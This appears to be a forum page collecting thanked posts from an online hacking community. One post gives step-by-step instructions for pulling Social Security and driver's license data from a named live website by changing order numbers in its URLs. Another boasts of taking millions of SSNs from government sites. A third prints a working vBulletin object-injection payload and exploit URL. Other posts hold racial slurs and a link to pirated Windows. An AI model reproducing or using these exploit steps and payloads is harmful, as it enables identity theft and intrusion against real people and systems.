User Controls
Posts That Were Thanked by SBTlauien
-
2017-03-24 at 4:31 AM UTC in LIVE HACK with Mr High(Security Hole Is Still Open!)This is a live security hole in a fishing license website. I am going to give exact instructions on how to pull personal information out of this website. This security hole is a very easy one and doesn't require any special software. All you need is a browser.
The website is https://wvhunt.com
0. Register an account. This doesn't require an email address to verify. Make sure to remember your login and password because you will have to login after making the account.
1. Click on the View Order History button from the main menu.
2. Change the number in the URL to a different number.
3. Keep changing it if it does not reveal any license information.
4. Click on any of the Select buttons.
5. Click the Home button. You will notice that the name on the right side is now a different person's name.
Sometimes the last step will take you directly into the registration area. You will see the person's date of birth. After clicking the next button you will see their social security number.
If you look at the source code you will be able to see the person's driver's license information and other personal information.
I obtained these quantities from this.
SSN = 132,624
DL = 256,568
This site may be monitored. They caught on to my last hack and I was hacking this site beforehand. They may know about it. But the security hole is still open as of right now.The following users say it would be alright if the author of this post didn't die in a fire! -
2017-03-17 at 12:28 AM UTC in Lanny is a real piece of work/shitjust chillin like a villian fam trying to not be a sexual degenerate anymore
The following users say it would be alright if the author of this post didn't die in a fire! -
2017-03-16 at 5:20 PM UTC in Lanny is a real piece of work/shitThe following users say it would be alright if the author of this post didn't die in a fire!
-
2017-03-16 at 4:40 AM UTC in Over 6,000,000 SSN hacked from 10 websites by MrHigh
Originally posted by Ajax Hey look, a screenshot of MrHigh's other thread in the news.
http://www.idahostatesman.com/news/politics-government/state-politics/article102340697.html
not only did these niggers refuse to say the site name, they won't even fucking link it.
That's it, I'm suing their asses for posting an image of my copyrighted totse theme without my permission
Post last edited by Lanny at 2017-03-16T04:45:38.204311+00:00The following users say it would be alright if the author of this post didn't die in a fire! -
2017-03-16 at 4:38 AM UTC in Over 6,000,000 SSN hacked from 10 websites by MrHighIf any intelligence agencies are reading this: are you hiring? I probably won't pass drug or loyalty tests but I can sip whisky and smoke cigars in dimly lit rooms while engaging in nefarious cyber activities with the best of them!The following users say it would be alright if the author of this post didn't die in a fire!
-
2017-03-15 at 6:15 AM UTC in Over 6,000,000 SSN hacked from 10 websites by MrHighWasn't it this dude who was in the article? Like some internet media outlet thing and they linked to the site.The following users say it would be alright if the author of this post didn't die in a fire!
-
2017-03-15 at 6:12 AM UTC in Over 6,000,000 SSN hacked from 10 websites by MrHighI found an easy security issue in a network of websites and was able to obtain over six million names, dob, and ssn. In the midst of pulling the data from the servers the admin must have noticed a large number of requests and investigated. The admin banned all of my accounts and fix the error. I estimate that it would have been over 10 million. I got over half of what I expected. I have not contacted the admin yet. I am going to wait and see if the US government announces it to the public. These were all government websites and most ended with .gov. The people were ordinary citizens using a certain service.
These are the totals from each state.
Alabama = 1,394,018
Arizona = 891,820
Arkansas = 597,242
Delaware = 236,293
Idaho = 151,992
Illinois = 1,235,564
Kansas = 647,230
Maine = 283,558
Oklahoma = 862,278
Vermont = 183,536
I know of several other security holes in government websites. That is all for now.
Your dearest friend,
MrHigh -
2017-03-15 at 2:32 AM UTC in Thanks for keeping me companyNothing beats drinking on the clock except maybe taking shits on the clock. Or taking shits while drinking. That's the ticket.
-
2017-03-13 at 2:31 AM UTC in Toucher - My First Python Program/For Laptops With Touchscreens(Linux)Java related:
The following users say it would be alright if the author of this post didn't die in a fire! -
2017-03-12 at 4:10 AM UTC in Toucher - My First Python Program/For Laptops With Touchscreens(Linux)I think you're supposed to add your python version to the shebang line. I mean linux knows where python lives it just doesn't know which version you want to use if you have both installed and your code might fail on either 2.7 or 3.x depending on the syntax.
Also why do your on and off method have a `self` argument? They aren't in a class, your methods aren't decorated and i don't know enough about Python to be able to tell if your on and off methods are static or not.
Also. Why do you write `if 1 == 1:main()`. 1 == 1 will always evaluate to true right? So no matter what you want to call `main()`. So why not just call it by just typing `main()` also shorthands like that look weird in python. Also it doesn't look to me like you need to pass any arguments to the on and off methods.
So like, in general when we pass an argument to a method/function if we want to do something with the value of the argument right? And have the the function return something based on the argument that is given.
I like to think of an argument in a function as a variable. We need the value of these variables to have the function return output based on our input. Consider this.
from selenium import webdriver
print "\nWould you like the program to proxy its connection?"
query = raw_input("[Y]es/[N]o: ")
if query == 'y':
IP = raw_input("\nPlease enter the proxy host IP: ")
PORT = raw_input("\nPlease enter the proxy port: ")
set_proxy = True
elif query == 'n':
print "\n[+]Establishing unproxied connection..."
set_proxy = False
else:
print "\n[!]Unhandled option, defaulting to unproxied connection..."
set_proxy = False
# Web Driver Proxy
def proxy(PROXY_HOST,PROXY_PORT):
fp = webdriver.FirefoxProfile()
print "[+]Proxy host set to: " + PROXY_HOST
print "[+]Proxy port set to: " + PROXY_PORT
print "\n[+]Establishing connection..."
fp.set_preference("network.proxy.type", 1)
fp.set_preference("network.proxy.http",PROXY_HOST)
fp.set_preference("network.proxy.http_port",int(PROXY_PORT))
fp.set_preference("general.useragent.override","'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'")
fp.update_preferences()
return webdriver.Firefox(firefox_profile=fp)
if set_proxy == True:
driver = proxy(IP, PORT)
else:
driver = webdriver.Firefox()
So what the proxy() function will return is dependent on the input of the user. Your on/off functions/methods don't need any input to do what they do, or at least so it seems to me. And it's well within the realm of possibility that i am wrong.
All in all you code pretty neatly in python. So bonus points for readability.The following users say it would be alright if the author of this post didn't die in a fire! -
2017-03-08 at 8:59 AM UTC in Im fucking conflicted you cucks"I want to have a vagina but I don't want to be a girl."
It's a thing these days. Thank away.The following users say it would be alright if the author of this post didn't die in a fire! -
2017-03-08 at 1 AM UTC in Is there any proof that Russia was behind the email hacking?
Originally posted by SBTlauien What I read is that a certain cyber security firm that would only benefit greatly by saying that this particular hack by Russia happened, said that it happened but wasn't able to provide any proof what-so-ever.
I think it would have exploded by now if it did actually happen.
sort of. I read the initial crowdstrike report from when the DNC servers got owned; they basically said that the techniques, attack vector and VPN/VPS service the attacks were staged from were consistent with another group (FancyBears) that they believe to be FSB/GRU. FancyBears have never been proven to have government ties and have denied it publicly.
In short - the attack was similar to an attack mounted by a group they believe to be linked to the Russian government without any factual basis. This was the initial report that the 'Russian involvement' story was based on.
I said at the time that it seemed to me that there was a definite trend of security companies attributing attacks to 'state actors' based on weak or no evidence - a sort of way to deflect their own failures; they try to give the impression that 'it's not our fault, how are we supposed to stop an adversary with so much training and funding?' to stop their clients from dropping them.The following users say it would be alright if the author of this post didn't die in a fire! -
2017-03-06 at 9 PM UTC in super glue on toilet seat
Originally posted by SBTlauien I currently work in retail and I had some kid call the store once saying that he was in the bathroom and there was no toilet paper. I told him I was one my way, and went back slacking.
well at least he used less by letting it dry out a bit.. leaves more dingleberries though :( poor kid.The following users say it would be alright if the author of this post didn't die in a fire! -
2017-03-06 at 11:27 AM UTC in Linux Kernel 4.4.0(Generic) Privilege Escalation exploits.
Originally posted by SBTlauien I was really hoping that it'd work. What are the reasons a 0day would work on one OS and not on another, asides from 32/64, amd/intel, and version? Could it be because I'm running an AMD processor?
I'm pretty sure you know but just to be clear, exploits on exploit-db aren't 0days, at least not anymore. And aside from the architecture issues that you mentioned it would really depend on how the exploit operates. If there are very specific conditions that need to be met in order for the exploit to work chances of it failing are of course greater. As i understand it this is why some exploits come in two parts, the stager to try and create the conditions and the actual bit of code that does the exploiting.
In any case i would be lying if i said i knew enough about the kernel/OS security to give any sort of in depth insight into this. As far as i know it can be a multitude of things that make an exploit fail. But i wouldn't be able to specifically tell why it fails without studying the exploit and getting more into OS/kernel fundamentals.
Speaking of which i found an ebook recently which i really think would be helpful when it comes to the subject. It's called Linux Kernel Development by Robert Love. You can find it online here if you're interested. Personally haven't gotten around to it yet but it's on my bucket list of things i want to learn/do. I heard a lot of good things about it.
Post last edited by Sophie at 2017-03-06T11:30:39.017382+00:00The following users say it would be alright if the author of this post didn't die in a fire! -
2017-03-05 at 1:55 AM UTC in I finally did itI got to 365 public contributions on github in the last year! Obviously not one a day for the whole span but it averages out. Yeah it's a meaningless easily gameable number but I didn't really do anything to inflate it and I've been trying to hit that mark for like two years now just as a goal.
~~yay~~The following users say it would be alright if the author of this post didn't die in a fire! -
2017-03-04 at 2:16 AM UTC in Is this jerome?The following users say it would be alright if the author of this post didn't die in a fire!
-
2017-02-26 at 9:49 PM UTC in NIS Short Film I MadeI think you all know what this means and the contents in it I made for Lanny and niggasin.space
it's only 2 minutes long or so
The following users say it would be alright if the author of this post didn't die in a fire! -
2017-02-19 at 11:08 PM UTC in The Specified Service Does Not Exist???For virus removal here are a few tips.
1. Don't use Windows.
2. No, seriously.
3. If you must go ahead and read on.
So with that out of the way i would suggest you get this tool. https://rufus.akeo.ie/ then get one of these https://www.lifewire.com/free-bootable-antivirus-tools-2625785
Now what you want to do is make a bootable USB for your anti-virus environment. The instructions for which are on the Rufus website. Then what you want to do is restart your PC then when it is restarting you smash F12, Esc, F2 or whatever it's going to be for your BIOS. Boot into your AV environment and run all the scans, then restart and remove USB.
You are now as virus free as you are going to get.
For Windows repair you can do the same, except you put your version of windows on the USB. Download one in ISO format. https://thepiratebay.org/search/windows/0/99/0
Follow the instructions to repair windows. Reboot.
If that didn't work lrn2google here is a Micrococks discussion thread on the issue.
https://answers.microsoft.com/en-us/windows/forum/windows_vista-update/the-specified-service-does-not-exist-as-an/3cb5a667-b9d8-4666-a0df-47154668d339
If that didn't work, backup your data to USB, and re-install windows with the USB you made for repair.
The following users say it would be alright if the author of this post didn't die in a fire! -
2017-02-10 at 12:06 PM UTC in How do you normally dress?
The following users say it would be alright if the author of this post didn't die in a fire! -
2017-02-01 at 4:28 AM UTC in Options For Attacking A Web Server That Aren't Web Application Related
php << 'eof'
<?php
class vB_Database {
public $functions = array();
public function __construct()
{
$this->functions['free_result'] = 'phpinfo';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
{
$this->db = new vB_Database();
$this->recordset = 1;
}
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7DThe following users say it would be alright if the author of this post didn't die in a fire!
